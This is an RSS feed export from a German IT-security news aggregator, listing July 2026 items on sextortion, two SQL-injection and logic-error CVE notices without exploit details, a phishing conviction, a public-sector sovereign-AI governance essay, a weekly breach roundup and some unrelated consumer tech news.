<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=sba7a+loan+stip+fraud%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 15:41:43 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 15:41:43 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=sba7a+loan+stip+fraud%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=sba7a+loan+stip+fraud%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Sextortion-Welle: Erpresser nutzen Datenlecks für 2.000-Dollar-Betrug - ad-hoc-news.de]]></title>
<description><![CDATA[Sextortion-Welle: Hacker ... CEO-Fraud und Sextortion zeigen, wie perfide Hacker psychologische Tricks nutzen, um Mitarbeiter und Privatpersonen unter ...]]></description>
<link>https://tsecurity.de/de/3695027/hacking/sextortion-welle-erpresser-nutzen-datenlecks-fuer-2000-dollar-betrug-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695027/hacking/sextortion-welle-erpresser-nutzen-datenlecks-fuer-2000-dollar-betrug-ad-hoc-newsde/</guid>
<pubDate>Sun, 26 Jul 2026 06:35:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sextortion-Welle: <b>Hacker</b> ... CEO-Fraud und Sextortion zeigen, wie perfide <b>Hacker</b> psychologische Tricks nutzen, um Mitarbeiter und Privatpersonen unter ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-30521 | SourceCodester Loan Management System 1.0 Frontend Interface interest_percentage logic error]]></title>
<description><![CDATA[A vulnerability was found in SourceCodester Loan Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the component Frontend Interface. This manipulation of the argument interest_percentage causes business logic errors.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/3694945/sicherheitsluecken/cve-2026-30521-sourcecodester-loan-management-system-10-frontend-interface-interestpercentage-logic-error/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694945/sicherheitsluecken/cve-2026-30521-sourcecodester-loan-management-system-10-frontend-interface-interestpercentage-logic-error/</guid>
<pubDate>Sat, 25 Jul 2026 22:49:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/sourcecodester:loan_management_system">SourceCodester Loan Management System 1.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>Frontend Interface</em>. This manipulation of the argument <em>interest_percentage</em> causes business logic errors.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-30521">CVE-2026-30521</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-30520 | SourceCodester Loan Management System 1.0 POST Request ajax.php save_loan borrower_id sql injection]]></title>
<description><![CDATA[A vulnerability was found in SourceCodester Loan Management System 1.0. It has been declared as critical. Affected by this vulnerability is the function save_loan of the file ajax.php of the component POST Request Handler. The manipulation of the argument borrower_id results in sql injection.

Th...]]></description>
<link>https://tsecurity.de/de/3694911/sicherheitsluecken/cve-2026-30520-sourcecodester-loan-management-system-10-post-request-ajaxphp-saveloan-borrowerid-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694911/sicherheitsluecken/cve-2026-30520-sourcecodester-loan-management-system-10-post-request-ajaxphp-saveloan-borrowerid-sql-injection/</guid>
<pubDate>Sat, 25 Jul 2026 22:22:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/sourcecodester:loan_management_system">SourceCodester Loan Management System 1.0</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is the function <code>save_loan</code> of the file <em>ajax.php</em> of the component <em>POST Request Handler</em>. The manipulation of the argument <em>borrower_id</em> results in sql injection.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-30520">CVE-2026-30520</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Your personal information is on the dark web. What happens next?]]></title>
<description><![CDATA[If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.]]></description>
<link>https://tsecurity.de/de/3694658/malware-trojaner-viren/your-personal-information-is-on-the-dark-web-what-happens-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694658/malware-trojaner-viren/your-personal-information-is-on-the-dark-web-what-happens-next/</guid>
<pubDate>Sat, 25 Jul 2026 19:04:48 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.]]></content:encoded>
</item>
<item>
<title><![CDATA[Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos]]></title>
<description><![CDATA[An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated ident...]]></description>
<link>https://tsecurity.de/de/3694556/hacking/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694556/hacking/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:46 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated identity theft, wire fraud, computer fraud, conspiracy to commit computer fraud, and […]</p>
<p>The post <a href="https://gbhackers.com/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users/">Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Sat, 25 Jul 2026 18:57:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Sugar’ Season 2, Episode 7 Release Date and What to Expect]]></title>
<description><![CDATA[“Sugar” Season 2, Episode 7 will arrive on Apple TV on Friday, July 31, 2026. The upcoming chapter serves as the penultimate episode, bringing John Sugar closer to the truth behind his latest case while his conflict with Deputy Vega reaches a dangerous stage.



The neo-noir detective series retu...]]></description>
<link>https://tsecurity.de/de/3693442/ios-mac-os/sugar-season-2-episode-7-release-date-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693442/ios-mac-os/sugar-season-2-episode-7-release-date-and-what-to-expect/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:43 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[“Sugar” Season 2, Episode 7 will arrive on Apple TV on Friday, July 31, 2026. The upcoming chapter serves as the penultimate episode, bringing John Sugar closer to the truth behind his latest case while his conflict with Deputy Vega reaches a dangerous stage.



The neo-noir detective series returned for its second season on June 19, with Colin Farrell once again playing the mysterious private investigator. New episodes have followed every Friday, and the eight-episode season will conclude on August 7.




Release date: Friday, July 31, 2026



Streaming platform: Apple TV



Season: 2



Episode: 7



Genre: Crime, drama, mystery and neo-noir



Season finale: Friday, August 7, 2026




What is happening in ‘Sugar’ Season 2?



Spoilers ahead for Season 2, Episode 6.



Season 2 follows Sugar as he investigates another disappearance in Los Angeles while continuing his personal search for his missing sister, Djen. His new case involves the disappearance of a boxer’s brother, but the investigation has gradually exposed a much larger criminal operation involving drugs, false death records and housing fraud.



Episode 6, titled “Cautionary Tale,” explored Sugar’s past and his growing fear that life on Earth has changed him. A flashback involving Peg Rosenthal showed the emotional damage caused when members of his alien community become too attached to human desires.



Meanwhile, Sugar obtained evidence connected to Operation: Fire Sale and confronted the increasingly unstable Deputy Vega. He stopped himself from killing Vega, although the episode’s final bar encounter made it clear that their conflict remains unresolved.



What to expect from Episode 7



Episode 7 will likely push Sugar and Vega toward a direct confrontation. Vega’s threat against Ji Moon gives Sugar another reason to act, while the evidence surrounding Operation: Fire Sale can expose everyone involved in the scheme.



The episode should also bring Sugar’s new investigation closer to a resolution before the finale. However, his search for Djen and his unfinished business with Henry remain part of the larger story that began in Season 1.



The first season ended after Sugar rescued Olivia Siegel and discovered that Henry, another member of his alien group, had information about Djen’s disappearance. Sugar chose to remain on Earth after the other Polyglots prepared to leave, setting up his continuing search in Season 2.



“Sugar” Season 2, Episode 7 streams July 31 on Apple TV. What do you think Sugar will do when he faces Vega again? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI image fraud will cost $40 billion next year - can these international standards help?]]></title>
<description><![CDATA[Until now, efforts to identify and combat deepfakes and AI scams have been scattered. Which proposed standard will dominate?]]></description>
<link>https://tsecurity.de/de/3693108/it-nachrichten/ai-image-fraud-will-cost-40-billion-next-year-can-these-international-standards-help/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693108/it-nachrichten/ai-image-fraud-will-cost-40-billion-next-year-can-these-international-standards-help/</guid>
<pubDate>Sat, 25 Jul 2026 06:44:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Until now, efforts to identify and combat deepfakes and AI scams have been scattered. Which proposed standard will dominate?]]></content:encoded>
</item>
<item>
<title><![CDATA[Facebook Launches Free Verified Badge to Confirm Real Users]]></title>
<description><![CDATA[Meta has announced Facebook Verified, a free badge that confirms a Facebook profile belongs to a real person rather than an AI-generated fake. The feature uses selfie verification and will first appear across Marketplace, Dating, Groups, and personal profiles.



Users must record a short video s...]]></description>
<link>https://tsecurity.de/de/3692275/ios-mac-os/facebook-launches-free-verified-badge-to-confirm-real-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692275/ios-mac-os/facebook-launches-free-verified-badge-to-confirm-real-users/</guid>
<pubDate>Fri, 24 Jul 2026 20:20:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta has announced Facebook Verified, a free badge that confirms a Facebook profile belongs to a real person rather than an AI-generated fake. The feature uses selfie verification and will first appear across Marketplace, Dating, Groups, and personal profiles.



Users must record a short video selfie, which Meta compares with their existing profile photos to confirm a match. The process usually takes a few minutes, and users only need to complete it once before the badge appears across supported parts of Facebook.



Who Can Get Facebook Verified?



Facebook Verified is available to eligible users aged 18 or older who follow Meta’s Community Standards and show no signs of fraud, scams, deceptive activity, or fake behaviour. Pages and ProMode accounts cannot use the feature because Meta has designed it specifically for personal profiles.



The badge gives users a visible sign that a profile has completed identity verification, especially when they view Marketplace listings, dating profiles, or Group members. However, the badge does not mean Facebook endorses the person or guarantees that every interaction will be safe.



Facebook Verified is separate from the paid Meta Verified subscription, which includes account support and impersonation protection. Meta is rolling out the free badge in select markets first and plans to expand it globally over time.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: Ransomware Surge, Data Breaches, and Rising Digital Threats]]></title>
<description><![CDATA[This week’s cybersecurity landscape highlights the continued expansion of cyber risks across governments, businesses, and consumers. From ransomware campaigns targeting organizations worldwide to credential-based attacks, data breaches, online fraud, and digital piracy crackdowns, recent incident...]]></description>
<link>https://tsecurity.de/de/3691669/it-security-nachrichten/the-cyber-express-weekly-roundup-ransomware-surge-data-breaches-and-rising-digital-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691669/it-security-nachrichten/the-cyber-express-weekly-roundup-ransomware-surge-data-breaches-and-rising-digital-threats/</guid>
<pubDate>Fri, 24 Jul 2026 15:30:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="831" height="491" src="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="The Cyber Express weekly roundup July 2026" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp 831w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-768x454.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-600x355.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-750x443.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp 831w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-768x454.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-600x355.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-750x443.webp 750w" sizes="(max-width: 831px) 100vw, 831px" title="The Cyber Express Weekly Roundup: Ransomware Surge, Data Breaches, and Rising Digital Threats 1"></p><span data-contrast="auto">This week’s cybersecurity landscape highlights the continued expansion of cyber risks across governments, businesses, and consumers. From ransomware campaigns targeting organizations worldwide to credential-based attacks, data breaches, online fraud, and digital piracy crackdowns, recent incidents show how threat actors are exploiting both technical vulnerabilities and human behavior.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The latest developments underline the need for stronger security practices, including improved identity protection, faster <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="29121">incident response</a>, and greater awareness of evolving cyber threats. Organizations are increasingly dealing with attacks that go beyond <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29120">data</a> theft, affecting operations, customer trust, and critical services.</span><span data-ccp-props="{}"> </span>
<h2 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<h3 aria-level="3"><b><span data-contrast="none">U.S. Accounts for Nearly Half of Global Ransomware Attacks in H1 2026</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The United States experienced 1,721 ransomware attacks during the first half of 2026, representing nearly 45% of all incidents tracked globally, according to research from <a href="https://cyble.com/resources/research-reports/global-threat-landscape-h1-2026/" target="_blank" rel="nofollow noopener">Cyble Research and Intelligence Labs (CRIL)</a>. The report identified <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29122">ransomware</a> groups Qilin and Akira as among the most active threat actors during the period. </span><a href="https://thecyberexpress.com/us-ransomware-attacks-in-h1-2026/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Dubai Police Warns Against Online Visa Fraud Schemes</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Dubai Police has issued a warning about fraudulent online advertisements offering work, residency, and visit visas in exchange for payment. Scammers have reportedly used social media platforms and messaging applications to impersonate government entities or unauthorized service providers to trick victims. </span><a href="https://thecyberexpress.com/dubai-police-fraudulent-visa-ads/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Craneware Data Breach Exposes Employee and Customer Information</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Healthcare technology company Craneware confirmed that unauthorized individuals accessed part of its data environment, resulting in the exposure of employee information as well as some customer and partner records. The company stated that the incident has been contained and has not disrupted business operations or customer services. </span><a href="https://thecyberexpress.com/craneware-data-breach/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b><span data-contrast="none"> </span></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">U.S. Targets Illegal FIFA World Cup Streaming Networks</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The U.S. Department of Justice seized more than 1,000 domains allegedly involved in illegally streaming FIFA World Cup 2026 matches. The action was carried out under Operation Offsides, an initiative focused on combating online piracy and protecting intellectual property rights. </span><a href="https://thecyberexpress.com/illegal-world-cup-streaming-domains-seized/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Chick-fil-A Customer Accounts Targeted in Credential Attack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Chick-fil-A confirmed that certain customer accounts were accessed during an automated credential-stuffing attack between June 17 and June 19, 2026. The attackers used account credentials obtained from an external source to gain unauthorized access. The company said affected information may have included customer names, email addresses, membership details, and limited payment-related data. </span><a href="https://thecyberexpress.com/chick-fil-a-data-security-incident/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">South Korea Diplomatic System Breach Lasted Nearly 10 Months</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">South Korea’s Ministry of Foreign Affairs revealed that attackers maintained access to the National Diplomatic Academy’s online education system for almost 10 months. The breach, which began in April 2025, exposed information linked to thousands of current and former ministry employees. Compromised data included user IDs, names, email addresses, and encrypted passwords. </span><a href="https://thecyberexpress.com/national-diplomatic-academy-data-breach-korea/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more..</span></b></a><b><span data-contrast="auto">.</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<span data-contrast="auto">The week’s incidents demonstrate how <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29124">cyber</a> threats continue to evolve across multiple areas, from ransomware and account compromise to online scams and government-related breaches. Attackers are increasingly targeting weaknesses in identity management, user behavior, and digital infrastructure.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Organizations and individuals must focus on proactive security measures, including stronger authentication controls, regular monitoring, timely updates, and greater awareness of <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="29123">social engineering</a> tactics. As cyber threats become more widespread and interconnected, improving resilience remains essential for protecting data, services, and public trust.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos]]></title>
